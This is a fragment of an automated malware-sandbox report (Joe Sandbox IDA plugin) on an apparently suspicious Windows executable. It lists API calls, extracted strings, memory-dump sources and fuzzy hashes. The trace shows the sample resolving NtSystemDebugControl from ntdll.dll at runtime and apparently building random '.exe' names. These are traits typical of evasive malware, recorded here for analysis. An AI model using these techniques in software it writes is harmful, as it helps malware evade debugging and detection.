                              • Instruction ID: 8ae84c531e4aeca00c518d3973b86aedda089a180a3e4d7d49737f07ef48758f
                              • Opcode Fuzzy Hash: 41800e4c9f8add10a00b615969736c3923428a10d6804466cc4c2afa688ba53e
                              • Instruction Fuzzy Hash: 28115B76504220FFCB339F19FC4885B7BADFB84721B16802DF8599B121D7749986DBA0
                              APIs
                              Strings
                              • .exe, xrefs: 00321C57
                              • ytqjAADLeHYQQDpcrJmravUWfuEVBuCjZaZeJkrLXfKlXIOksHdoKhnMyymsYFnCBRqeGtPZFwphgNmYWciSgRtHdwOlLSfNxSCsEkPIGTwqUpzMiuoRlvKbVQbXOaxJPioDhcnxjVNgTzEbTzUFdGAMIvBW, xrefs: 00321B8A, 00321B9C, 00321C15, 00321C49
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: lstrcatmemcpymemsetrandsrand
                              • String ID: .exe$ytqjAADLeHYQQDpcrJmravUWfuEVBuCjZaZeJkrLXfKlXIOksHdoKhnMyymsYFnCBRqeGtPZFwphgNmYWciSgRtHdwOlLSfNxSCsEkPIGTwqUpzMiuoRlvKbVQbXOaxJPioDhcnxjVNgTzEbTzUFdGAMIvBW
                              • API String ID: 122620767-2686580828
                              • Opcode ID: 5d81c1e5bf6bd1c16f9c645c294c3885ac4568df7431c9b5d26cb763353d742a
                              • Instruction ID: 1a5682500477a0dbc9931a426ad8d1518a5832c33072594163ddc8eb9dbcdf23
                              • Opcode Fuzzy Hash: 5d81c1e5bf6bd1c16f9c645c294c3885ac4568df7431c9b5d26cb763353d742a
                              • Instruction Fuzzy Hash: AC215E32E842B06EE33713397D90BAA3F588FB3721F17409DF9851B193D268098783A4
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00321334
                              • GetProcAddress.KERNEL32(00000000), ref: 0032133B
                              • memset.MSVCRT ref: 00321359
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcmemset
                              • String ID: NtSystemDebugControl$ntdll.dll
                              • API String ID: 3137504439-2438149413
                              • Opcode ID: af02a00857f0b0a2a600ae40bf1e5c5e61aa691b649396bd0e7b43884ba380c5
                              • Instruction ID: 8981da24d4c7ef6053f64b0ede1ca39bc9fb2067215739e0839eb778d61e0e9d
                              • Opcode Fuzzy Hash: af02a00857f0b0a2a600ae40bf1e5c5e61aa691b649396bd0e7b43884ba380c5
                              • Instruction Fuzzy Hash: 53018075A0032DBFDB22DF94FD859AFBBADFB51314F00452AFA01A2140E3749655CA51
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                              • String ID:
                              • API String ID: 3636361484-0
                              • Opcode ID: e0c04ae3e6705ae065ec9c2a1441b07fd5dc7edd5bca3f541b0ff7adac20adae
                              • Instruction ID: 3594e0387f49b448ea65b82e8c15ebd67ba01cff29f35edf3e0aaeeda47e60b0
                              • Opcode Fuzzy Hash: e0c04ae3e6705ae065ec9c2a1441b07fd5dc7edd5bca3f541b0ff7adac20adae
                              • Instruction Fuzzy Hash: 3E01F9B29142696FEB325B60FD48FD677DCDB14310F06406AEA46E3090EA749A858BA4
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0032603C
                              • GetProcAddress.KERNEL32(00000000,00326064), ref: 0032604F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: kernel32.dll
                              • API String ID: 1646373207-1793498882
                              • Opcode ID: 0420f9334c45194695e7ffbd4d26ac948a58e5d951b1847e77c8fb1bbedb689e
                              • Instruction ID: f9c0a1d7f868a625255c0ded8df58830b1d0749b8ed1a6b6c7c42990410b8c06
                              • Opcode Fuzzy Hash: 0420f9334c45194695e7ffbd4d26ac948a58e5d951b1847e77c8fb1bbedb689e
                              • Instruction Fuzzy Hash: D6F0F0F11442A98FEF718EA4DC45BDE3BE4EF15700F50442AEA0DCB281CB3496059B64